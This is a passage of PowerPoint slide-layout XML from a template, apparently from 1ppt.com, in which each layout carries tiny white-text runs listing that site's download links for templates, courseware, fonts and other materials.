              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout237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37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37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37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3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38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38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38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38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38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38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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout238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38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38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38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3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39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39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39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39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39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39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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout239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39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39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39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4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40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40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40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40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40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40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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
